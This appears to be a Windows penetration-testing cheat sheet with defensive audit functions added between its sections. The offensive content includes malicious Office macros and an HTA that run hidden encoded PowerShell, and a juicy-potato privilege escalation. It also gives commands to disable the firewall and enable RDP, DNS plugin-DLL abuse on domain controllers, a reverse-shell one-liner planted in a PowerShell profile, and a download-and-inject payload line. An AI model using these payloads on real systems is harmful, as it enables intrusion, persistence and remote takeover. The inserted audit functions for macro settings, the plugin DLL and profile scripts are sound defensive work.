Windows
Use a Windows VM, install the required tools from here, then get the script Out-CHM.ps1 and create your payload:

```powershell
Out-CHM -Payload C:\Windows\System32\spool\drivers\color\nc.exe -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
```
```text
use windows/local/ms16_075_reflection_juicy
set SESSION <>
set CLSID <>
```
Common CLSIDs for the exploit are:
- {e60687f7-01a1-40aa-86ac-db1cbf673334}
- {752073A1-23F2-4396-85F0-8FDB879ED0ED}
- {3c6859ce-230b-48a4-be6c-932c0c202048}
- {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
- {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
Simple Word macro (View > Macros; at the end use File > Info > Check for Issues to purge personal details), save as .doc:

```vba
Sub DoStuff()
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "<powershell command here>"
    Set wsh = Nothing
End Sub

Sub AutoOpen()
    DoStuff
End Sub
```
Alternatively we can use an HTA:

```html
<script language="VBScript">
Function DoStuff()
    Dim wsh
    Set wsh = CreateObject("Wscript.Shell")
    wsh.run "powershell -Sta -Nop -Window Hidden -EncodedCommand <blah>"
    Set wsh = Nothing
End Function
DoStuff
self.close
</script>
```
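Whether an AutoOpen macro like the one above ever runs is decided by the Office macro security setting, so the check a defender wants first is what that setting actually is on a given workstation. The following audit function is an added example and not part of the original page; the registry keys and the VBAWarnings / blockcontentexecutionfrominternet value names are the documented Office ones, while the application list and the `16.0` version string are assumptions to adjust for your build.

```powershell
# Added example (not from the original page): audit the Office macro settings that
# decide whether an AutoOpen macro in a .doc is allowed to run, and whether macros in
# files marked as downloaded from the internet are blocked outright.
# The GPO-managed Policies hive wins over the user hive, so it is read first.
function Get-OfficeMacroFinding {
    param(
        [string[]] $Apps    = @('Word', 'Excel', 'PowerPoint'),   # assumption
        [string]   $Version = '16.0'                                # Office 2016/2019/365 (assumption)
    )

    # Documented meaning of the VBAWarnings value
    $vbaMeaning = @{
        1 = 'Enable all macros (dangerous)'
        2 = 'Disable all macros with notification (user can click Enable)'
        3 = 'Disable all except digitally signed macros'
        4 = 'Disable all macros without notification'
    }

    foreach ($app in $Apps) {
        $policyKey = "HKCU:\Software\Policies\Microsoft\Office\$Version\$app\Security"
        $userKey   = "HKCU:\Software\Microsoft\Office\$Version\$app\Security"

        $warn = $null
        $source = 'not set (Office default = 2)'
        $blockInternet = $null

        foreach ($key in @($policyKey, $userKey)) {
            if (-not (Test-Path -Path $key)) { continue }
            $props = Get-ItemProperty -Path $key
            if ($null -eq $warn -and $null -ne $props.VBAWarnings) {
                $warn = [int]$props.VBAWarnings
                $source = $key
            }
            if ($null -eq $blockInternet -and $null -ne $props.blockcontentexecutionfrominternet) {
                $blockInternet = [int]$props.blockcontentexecutionfrominternet
            }
        }

        $effective = if ($null -ne $warn) { $warn } else { 2 }
        $severity = switch ($effective) {
            1       { 'High' }
            2       { 'Medium' }   # one click on "Enable Content" away from running the macro
            default { 'Low' }
        }

        [pscustomobject]@{
            Application         = $app
            VBAWarnings         = $effective
            Meaning             = $vbaMeaning[$effective]
            Source              = $source
            BlockInternetMacros = ($blockInternet -eq 1)
            Severity            = $severity
        }
    }
}

# Usage: list the settings, most permissive first
Get-OfficeMacroFinding | Sort-Object VBAWarnings | Format-Table -AutoSize
```

The HTA variant does not go through Office at all: it is executed by mshta.exe, so the equivalent control there is an application-control rule (AppLocker or WDAC) for that binary rather than a macro setting.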
Use WiX to generate MSI files from XML or to manipulate existing MSI files. A complete example can be seen in the Ethereal Writeup.
List the firewall rules, enable RDP (via reg or PowerShell) and switch the firewall off:

```powershell
netsh advfirewall firewall show rule name=all
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0'
netsh advfirewall set allprofiles state off
```
To run commands with runas, the user has to have logged in at least once.
Set the DNS server plugin DLL with dnscmd (requires RSAT):

```cmd
dnscmd <dc> /config /serverlevelplugindll \\<ip>\<dll>
```

Or with the DnsServer PowerShell module (requires RSAT):

```powershell
$dnssettings = Get-DnsServerSetting -ComputerName <dc> -Verbose
$dnssettings.ServerLevelPluginDll = "\\<ip>\<dll>"
Set-DnsServerSetting -InputObject $dnssettings -ComputerName <dc> -Verbose
```

Then restart the service:

```cmd
sc.exe stop dns
sc.exe start dns
```
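Because the DNS service loads the configured plugin DLL as SYSTEM at start-up, the single value set above is worth auditing on every DNS server. The following function is an added example and not part of the original page or of the DnsServer module: it reads ServerLevelPluginDll through `Get-DnsServerSetting -All` (the `-All` switch is what exposes the property in the module's output), falls back to the backing registry value over PowerShell remoting, and classifies what it finds. Server names in the usage line are assumptions.

```powershell
# Added example (not from the original page): audit the ServerLevelPluginDll setting.
# The value should be empty on almost every DNS server; a UNC path is the clearest
# red flag because it means the DC loads a DLL from a network share as SYSTEM.
function Get-DnsPluginDllFinding {
    param([Parameter(Mandatory)] [string[]] $ComputerName)

    foreach ($dc in $ComputerName) {
        $dll = $null
        $via = 'DnsServer module'
        try {
            $dll = (Get-DnsServerSetting -ComputerName $dc -All -ErrorAction Stop).ServerLevelPluginDll
        } catch {
            $via = 'registry (remoting)'
            # Backing registry value of the setting that dnscmd / Set-DnsServerSetting modify
            $dll = Invoke-Command -ComputerName $dc -ScriptBlock {
                (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
                    -ErrorAction SilentlyContinue).ServerLevelPluginDll
            }
        }

        $verdict = Test-DnsPluginDllPath -Path $dll
        [pscustomobject]@{
            Server    = $dc
            PluginDll = $dll
            Severity  = $verdict.Severity
            Reason    = $verdict.Reason
            Via       = $via
        }
    }
}

# Classification kept separate so it can be exercised on sample values without a DC.
function Test-DnsPluginDllPath {
    param([AllowNull()][AllowEmptyString()][string] $Path)

    if ([string]::IsNullOrWhiteSpace($Path)) {
        return @{ Severity = 'OK'; Reason = 'no plugin DLL configured' }
    }
    if ($Path.StartsWith('\\')) {
        return @{ Severity = 'High'; Reason = 'plugin DLL is loaded from a network share' }
    }
    # Local path: only a DLL inside System32 is plausibly legitimate (-match is case-insensitive)
    if ($Path -notmatch '^[A-Za-z]:\\Windows\\System32\\[^\\]+\.dll$') {
        return @{ Severity = 'High'; Reason = 'plugin DLL lives outside System32' }
    }
    return @{ Severity = 'Review'; Reason = 'plugin DLL configured; confirm it is expected and signed' }
}

# Usage (assumed server names):
# Get-DnsPluginDllFinding -ComputerName dc01, dc02 | Format-Table -AutoSize
```

Restarting the DNS service, as the page does right after setting the value, is itself a useful signal: an unexpected stop/start of the DNS service on a domain controller paired with a non-empty plugin DLL is the combination to alert on.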
In Constrained Language Mode, read a file:

```powershell
${C:\file.txt}
```

Write a file:

```powershell
${C:\file.txt} = 'content'
```

Break out by writing a PowerShell profile (executed whenever PowerShell is started by this user):

```powershell
${C:\users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1} = '$client = New-Object System.Net.Sockets.TCPClient("<ip>",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
```

Via script blocks:

```powershell
& { ls }
```

Custom function:

```powershell
PS> function xct { ls };
PS> xct
...
```

These tricks only work in Constrained Language Mode; with JEA, the "NoLanguage" mode is what should normally be used.
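The profile breakout above works because a profile script is a persistence location that every new shell of that user executes, so the practical check is to enumerate the profile paths on a host and look inside them. The following function is an added example, not part of the original page: the profile locations are the standard ones, while the indicator list is an assumption tuned to the one-liner shown above (TCPClient, iex, GetStream) and should be extended for your environment.

```powershell
# Added example (not from the original page): find PowerShell profile scripts on this
# host and flag content matching the breakout pattern above. Also shows how to read the
# language mode of the current session.
function Get-PowerShellProfileFinding {
    param([string] $UsersRoot = "$env:SystemDrive\Users")   # assumption: default profile root

    # Strings that appear in the page's reverse-shell profile (assumed indicator list)
    $indicators = @('TCPClient', 'Invoke-Expression', 'iex ', 'DownloadString',
                    'EncodedCommand', 'GetStream', 'FromBase64String')
    $profileNames = @('profile.ps1', 'Microsoft.PowerShell_profile.ps1',
                      'Microsoft.PowerShellISE_profile.ps1')

    # All-users location plus every per-user Documents\WindowsPowerShell folder
    $dirs = @("$env:SystemRoot\System32\WindowsPowerShell\v1.0")
    $dirs += Get-ChildItem -Path $UsersRoot -Directory -ErrorAction SilentlyContinue |
             ForEach-Object { Join-Path $_.FullName 'Documents\WindowsPowerShell' }

    foreach ($dir in $dirs) {
        foreach ($name in $profileNames) {
            $path = Join-Path $dir $name
            if (-not (Test-Path -LiteralPath $path)) { continue }
            $item    = Get-Item -LiteralPath $path
            $content = Get-Content -LiteralPath $path -Raw -ErrorAction SilentlyContinue
            $hits    = @(Find-ProfileIndicator -Content $content -Indicators $indicators)
            $severity = if ($hits.Count -gt 0) { 'High' } else { 'Review' }
            [pscustomobject]@{
                Path       = $path
                LastWrite  = $item.LastWriteTime
                SizeBytes  = $item.Length
                Indicators = ($hits -join ', ')
                Severity   = $severity
            }
        }
    }
}

# Pure matching helper so the rule can be tried on sample text without touching disk.
function Find-ProfileIndicator {
    param([AllowNull()][string] $Content, [string[]] $Indicators)
    if ([string]::IsNullOrEmpty($Content)) { return @() }
    # -like is case-insensitive; return every indicator that occurs in the content
    return @($Indicators | Where-Object { $Content -like "*$_*" })
}

# Usage:
# "Language mode of this session: $($ExecutionContext.SessionState.LanguageMode)"
# Get-PowerShellProfileFinding | Format-Table -AutoSize
```

The point to take from the breakout is that Constrained Language Mode on its own is not a security boundary; it is meant to be enforced by an application-control policy (WDAC or AppLocker) that also governs which scripts, profiles included, may run at all.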
```java
String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://<ip>/payload.dll');(New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";
```